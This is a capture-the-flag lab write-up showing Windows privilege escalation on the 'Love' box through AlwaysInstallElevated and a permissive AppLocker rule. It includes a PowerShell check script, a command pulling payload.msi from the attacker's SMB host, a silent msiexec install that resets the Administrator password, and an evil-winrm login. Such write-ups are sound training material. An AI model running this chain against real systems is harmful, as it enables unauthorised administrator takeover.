MSI Installation


As discovered previously, the target system has a vulnerable Windows Installer policy: AlwaysInstallElevated is set in both HKLM and HKCU, so any MSI package the current user installs runs with SYSTEM privileges. Two further conditions allow the current user to turn this into a privilege escalation:

  • one of the AppLocker Windows Installer rules allows SID S-1-5-21-2955427858-187959437-2037071653-1002 to run MSI packages from the C:\Administration directory
  • the SID of the current user is S-1-5-21-2955427858-187959437-2037071653-1002, so the rule applies to this account
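Before staging anything, both conditions can be confirmed from the low-privileged shell itself. The following PowerShell is an added example, not part of the original writeup; it assumes the AppLocker module is present on the target (it is on Windows 10/Server with RSAT) and reuses the C:\Administration\payload.msi drop path from this writeup.

```powershell
# Added example (not from the original writeup): verify the two conditions
# the escalation depends on before copying a payload over.

$hives = @{
    'HKLM' = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    'HKCU' = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
}

# 1. AlwaysInstallElevated must be 1 in BOTH hives. The Windows Installer
#    service only elevates when the machine policy and the user policy agree;
#    one hive alone is not exploitable.
$elevated = $true
foreach ($h in $hives.GetEnumerator()) {
    $v = (Get-ItemProperty -Path $h.Value -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    "{0} AlwaysInstallElevated = {1}" -f $h.Key, $(if ($null -eq $v) { '<not set>' } else { $v })
    if ($v -ne 1) { $elevated = $false }
}

# 2. SID of the account we are running as, to compare with the SID named
#    in the AppLocker rule.
$sid = [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value
"Current SID: $sid"

# 3. Ask AppLocker directly whether an MSI at the intended drop path would be
#    allowed for this SID. Path rules evaluate without the file; publisher or
#    hash rules need the file to exist, so re-run this after staging if the
#    decision comes back as an error.
$drop = 'C:\Administration\payload.msi'   # drop path used in this writeup
$policy = Get-AppLockerPolicy -Effective
$decision = Test-AppLockerPolicy -PolicyObject $policy -Path $drop -User $sid -ErrorAction SilentlyContinue
"AppLocker decision for {0}: {1}" -f $drop, $decision.PolicyDecision

if ($elevated -and $decision.PolicyDecision -eq 'Allowed') {
    "Both conditions hold: msiexec /i $drop will execute the package as SYSTEM."
} else {
    "Conditions not met; AlwaysInstallElevated alone is not enough if AppLocker blocks the MSI."
}
```

PolicyDecision comes back as Allowed, Denied, DeniedByDefault or AllowedByDefault; only an explicit or default allow means msiexec will actually launch the package for this user. If either registry value is missing or 0, the installer runs with the caller's own token and the whole chain fails regardless of what AppLocker permits.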
c:\Administration> copy \\10.10.14.17\smb\payload.msi
        1 file(s) copied.

The payload is delivered over SMB from the attacking host (10.10.14.17) into the directory the AppLocker rule permits.

c:\Administration> msiexec /quiet /qn /i C:\Administration\payload.msi

Because the Windows Installer service runs the package as SYSTEM, the payload's action succeeds: it changes the password of the local Administrator account to Qwer1234. The new credential can then be used over WinRM.

┌──(kali㉿kali)-[~/archive/htb/labs/love]
└─$ evil-winrm -i $IP -u administrator -p Qwer1234
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
love\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
Love
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 10.10.10.239
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2

System Level Compromise